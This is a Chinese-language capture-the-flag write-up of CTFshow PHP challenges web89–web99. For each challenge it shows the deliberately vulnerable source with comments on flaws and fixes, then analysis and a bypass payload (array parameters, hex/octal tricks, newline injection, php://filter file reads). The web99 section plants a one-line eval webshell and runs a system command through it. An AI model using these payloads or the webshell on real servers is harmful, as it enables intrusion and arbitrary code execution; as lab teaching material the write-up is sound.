CTFshowPHP特性
目录
web89
代码分析
payload
web90
代码分析
payload
web91
代码分析
payload
web92
代码分析
payload
web93
代码分析
payload
web94
代码分析
payload
web95
web96
代码分析
payload
web97
代码分析
payload
web98
代码分析
payload
web99
代码分析
payload
web89
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 15:38:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web89): $flag is printed when num passes a
// digit blacklist yet still converts to a non-zero integer.
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    // Rejects any value containing a decimal digit. The value is never
    // checked to be a string: for an array (num[]=...) preg_match cannot
    // match and returns false on PHP 7 (with a warning; PHP 8 throws a
    // TypeError), so this guard is skipped.
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    // intval() of a non-empty array is 1, so an array satisfies this test
    // without containing a digit. Rejecting non-string input (is_string) or
    // validating with ctype_digit before converting would close the gap.
    if(intval($num)){
        echo $flag;
    }
}
代码分析
if(isset($_GET['num'])){ #检查参数是否为num,是则下一步
if(preg_match("/[0-9]/", $num)){die("no no no!"); #用正则表达式检查 $num 是否包含数字0~9,如果包含则结束程序
if(intval($num)){ echo $flag; #使用 intval 函数将 $num 转换为整数,如果转换后不为0则输出flag
payload
这题我们用数组绕过
?num[]=
web90
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:06:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web90): the exact string "4476" is rejected, but
// intval() with base 0 maps several other spellings to the integer 4476.
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    // Strict === only blocks this one string, not other representations.
    if($num==="4476"){
        die("no no no!");
    }
    // With base 0, intval() honours a 0x (hex) or leading-0 (octal) prefix
    // and stops at the first non-digit, so e.g. "0x117c" or "4476a" also
    // evaluate to 4476. Validating the raw string (ctype_digit) before
    // converting, then comparing the int, would make the two checks agree.
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}
代码分析
if($num==="4476"){die("no no no!"); #如果 $num 严格等于字符串 "4476"(=== 要求类型和值都相同)就结束程序
if(intval($num,0)===4476){echo $flag; #使用 intval 函数将 $num 转换为整数,如果转换后为4476则输出flag
payload
可以用进制绕过
?num=0x117c
也可以用intval函数进行绕过
intval("4476a") 会返回 4476,而 intval("a4476") 会返回 0。
因此,即使 num 参数包含非数字字符,只要这些字符后面跟着数字 4476,intval 仍然会返回 4476
所以构造
?num=4476a
web91
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:16:09
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web91): the two regexes differ only in the /m
// (multiline) modifier, and the flag is printed when they disagree.
show_source(__FILE__);
include('flag.php');
// No isset() guard: a missing cmd parameter raises an undefined-index notice.
$a=$_GET['cmd'];
// With /m, ^ and $ also match at line boundaries, so any value containing a
// line that is exactly "php" passes this test.
if(preg_match('/^php$/im', $a)){
    // Without /m, ^ anchors to the start of the whole string, so a value whose
    // first character is a newline fails here and reaches the flag branch.
    // Anchoring with \A and \z (or the D modifier) and rejecting newlines
    // would make both tests agree.
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}
代码分析
$a=$_GET['cmd']; #cmd 参数的值,赋值给变量 $a
if(preg_match('/^php$/im', $a)){ #使用preg_match函数检查 $a是否完全匹配字符串 php
'^php$' #表示字符串必须从头到尾完全等于 php
im #i 表示不区分大小写,m 表示多行模式(多行模式下 ^ 和 $ 可以匹配每一行的开头和结尾,而不只是整个字符串的开头和结尾)
echo 'hacker'; #完全匹配字符串 php则输出hacker
if(preg_match('/^php$/i', $a)){echo 'hacker';}else{echo $flag;#如果 $a 完全匹配 php(不区分大小写),则输出 hacker,否则输出flag
else {echo 'nonononono';
} #如果 $a 不匹配 php,则输出 nonononono
payload
?cmd=%0aphp
web92
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:29:30
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web92): like web90 but with loose == on both
// comparisons.
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    // Loose == treats numeric strings numerically ("4476", "4476.0", ...),
    // but a hex string such as "0x117c" is not a numeric string in PHP 7+,
    // so it is not equal to 4476 here.
    if($num==4476){
        die("no no no!");
    }
    // intval() with base 0 does recognise the 0x prefix, so "0x117c" becomes
    // 4476 and passes. Validating the raw string (ctype_digit) before
    // converting would close the gap.
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}
代码分析
}else{echo intval($num,0); #如果转换后的结果不为4476,则输出转换后的整数值
payload
用十六进制绕过:字符串 "0x117c" 不是数字字符串,所以 $num==4476 不成立;而 intval($num,0) 在 base 为 0 时会识别 0x 前缀,得到 4476
?num=0x117c
web93
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:32:58
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web93): web92 plus a letter blacklist, which
// blocks the 0x form but not the octal form.
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    // Loose == : "010574" is a numeric string worth 10574, so it is not
    // equal to 4476 here.
    if($num==4476){
        die("no no no!");
    }
    // Rejects any letter (case-insensitive), so hex prefixes cannot be used.
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    // intval() with base 0 still parses a leading 0 as octal: 010574 (octal)
    // is 4476 (decimal). A blacklist cannot enumerate every representation;
    // validating with ctype_digit and comparing the decimal int is simpler.
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}
代码分析
if(preg_match("/[a-z]/i", $num)){ #使用正则表达式检查 $num 是否包含任何字母(不区分大小写)die("no no no!");} #如果 $num 包含字母,程序将立即终止,并输出 "no no no!"。
payload
可以用8进制数绕过:字母被过滤后不能再用 0x,但 intval($num,0) 仍会把前导 0 当作八进制解析,010574(八进制) = 4476(十进制)
?num=010574
web94
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:46:19
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web94): web93 plus a strpos() test meant to stop
// a leading 0, and strict === on the string comparison.
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    // strpos() returns 0 when "0" is the first character and false when "0"
    // is absent; both are falsy, so this dies unless a "0" appears at some
    // non-leading position. A sign in front ("+010574") moves the 0 off
    // position 0 while intval() with base 0 still parses it as octal.
    // The intended "no leading zero" rule would be `$num[0] === '0'`.
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}
代码分析
与上题相比较,多了一个strpos函数
if(!strpos($num, "0")){die("no no no!"); #strpos 在 "0" 位于开头时返回 0,在不含 "0" 时返回 false,两者取反后都为真,所以 0 必须出现且不能在开头,否则输出no no no!
payload
?num=+010574
可以用+来绕过:前面加上 + 之后 0 不再位于开头,而 intval($num,0) 仍然按八进制解析
web95
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:53:59
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web95): web94 with a loose == on the first check
// and a dot added to the blacklist; the strpos() weakness is unchanged.
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    // Loose == : "+010574" is a numeric string worth 10574, not 4476.
    if($num==4476){
        die("no no no!");
    }
    // Rejects letters and "." (so hex and decimal-point forms are out).
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    // As in web94: strpos() is 0 (falsy) for a leading "0" and false when
    // absent, so a "0" must appear after position 0. Use `=== false` and a
    // separate first-character check to express the intended rule.
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    // base 0 still parses a signed octal string such as "+010574" as 4476.
    if(intval($num,0)===4476){
        echo $flag;
    }
}
同上(比 web94 多过滤了小数点,并把第一个比较改成了 ==,payload 相同)
web96
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 19:21:24
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web96): a user-supplied path is passed to
// highlight_file() after excluding only the literal string 'flag.php'.
highlight_file(__FILE__);
if(isset($_GET['u'])){
    // Plain string comparison: any other spelling of the same file (a
    // relative prefix such as ./flag.php) or a stream wrapper (php://filter)
    // is not caught. A real fix resolves the path with realpath() and
    // compares it against an allow-list of permitted files.
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
}
代码分析
if(isset($_GET['u'])){ #参数要为u
if($_GET['u']=='flag.php'){die("no no no"); #如果参数u=flag.php则输出no no no
}else{highlight_file($_GET['u']); #如果参数u不等于flag.php,则highlight_file 函数高亮显示用户指定的文件内容(这里只做了字符串相等比较,没有对路径做规范化)
payload
?u=php://filter/convert.base64-encode/resource=flag.php
直接用伪协议读取flag.php文件
?u=./flag.php
也可以绕过(./flag.php 与字符串 'flag.php' 不相等,但指向的是同一个文件)
web97
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 19:36:32
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web97): two POST values must differ yet produce
// identical md5() results.
include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
    // Loose != : two arrays with different contents are "not equal".
    if ($_POST['a'] != $_POST['b'])
        // md5() is defined for strings only. Given an array, PHP 7 returns
        // NULL (with a warning) for both sides, so NULL === NULL holds;
        // PHP 8 throws a TypeError instead. Checking is_string() on both
        // values before hashing removes this path (and MD5 is not
        // collision-resistant, so a stronger hash is advisable anyway).
        // Note the else below binds to this inner if.
        if (md5($_POST['a']) === md5($_POST['b']))
            echo $flag;
        else
            print 'Wrong.';
}
?>
代码分析
if (isset($_POST['a']) and isset($_POST['b'])) {#检查是否存在名为 a 和 b 的 POST 参数,
if ($_POST['a'] != $_POST['b']) #检查 a 和 b 的值是否不相等
if (md5($_POST['a']) === md5($_POST['b'])) #检查 a 和 b 的md5值是否相等
payload
post数组绕过(两个内容不同的数组满足 !=;而 md5() 在 PHP 7 下对数组参数返回 NULL,所以 NULL === NULL 成立)
a[]=1&b[]=2
web98
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 21:39:27
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web98): each ternary may rebind the $_GET
// superglobal by reference, so later reads of $_GET actually read $_POST,
// $_COOKIE or $_SERVER depending on which branches were taken.
include("flag.php");
// Any non-empty query string makes $_GET truthy; from here on $_GET is an
// alias of $_POST (the 'flag' string in the else arm is discarded).
$_GET?$_GET=&$_POST:'flag';
// Loose == against 'flag'; if it holds, $_GET now aliases $_COOKIE.
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
// Same test again; if it holds, $_GET now aliases $_SERVER.
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
// Highlights the file named by $flag (defined in flag.php, not visible here)
// when HTTP_FLAG, read through whichever array $_GET currently aliases,
// equals 'flag'; otherwise highlights this file. Rebinding superglobals by
// reference is the root cause: read input from the intended array directly.
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);?>
代码分析
$_GET?$_GET=&$_POST:'flag'; # 三元运算符,$_GET为真则执行$_GET=&$_POST,假则为flag
$_GET $_GET['flag'] #数组
$_SERVER #值为$_SERVER
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__); #如果get参数HTTP_FLAG的值为flag,就输出flag
只要 GET 参数非空,$_GET 就成为 $_POST 的引用
如果此时 $_GET['flag'](也就是 $_POST['flag'])等于 'flag',$_GET 又会变成 $_COOKIE 的引用
如果 $_GET['flag'](此时是 $_COOKIE['flag'])再等于 'flag',$_GET 就变成 $_SERVER 的引用
最后一行读取的 $_GET['HTTP_FLAG'] 实际来自引用当前指向的那个数组
payload
get:?1=2 #这里任意非空的 GET 参数都可以,因为第一行只判断 $_GET 是否为真(非空)
post:HTTP_FLAG=flag
web99
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 22:36:12
# @link: https://ctfer.com
*/
// Challenge source (CTFshow web99): builds a list of random integers, then
// writes request-controlled content to a request-controlled path if the path
// loosely matches one of them.
highlight_file(__FILE__);
$allow = array();
// 0x36d == 877, so 841 values are drawn from rand(1,$i). rand() is not a
// CSPRNG, but the set's contents barely matter given the comparison below.
for ($i=36; $i < 0x36d; $i++) {
    array_push($allow, rand(1,$i));
}
// in_array() without strict:true uses loose comparison: on PHP 7 a
// leading-numeric string such as "203.php" compares equal to the int 203
// (PHP 8's saner string/number comparison no longer does). Once the check
// passes, file_put_contents() writes the POST body to a request-chosen
// filename, i.e. an arbitrary file write. in_array(..., true) plus never
// deriving a filesystem path from request input is the fix.
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}?>
代码分析
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){file_put_contents($_GET['n'], $_POST['content']);
} #检查参数n是否存在且在 $allow 中(in_array 没有传 strict 参数,使用宽松比较,例如 '203.php' == 203 在 PHP 7 中成立),如果条件满足,
则使用 file_put_contents() 函数将 $_POST['content'] 的内容写入到文件 $_GET['n'] 中。
所以可以写入一句话木马
payload
get:?n=203.php
post:content=<?php @eval($_POST[1]);?>
1=system("tac flag36d.php");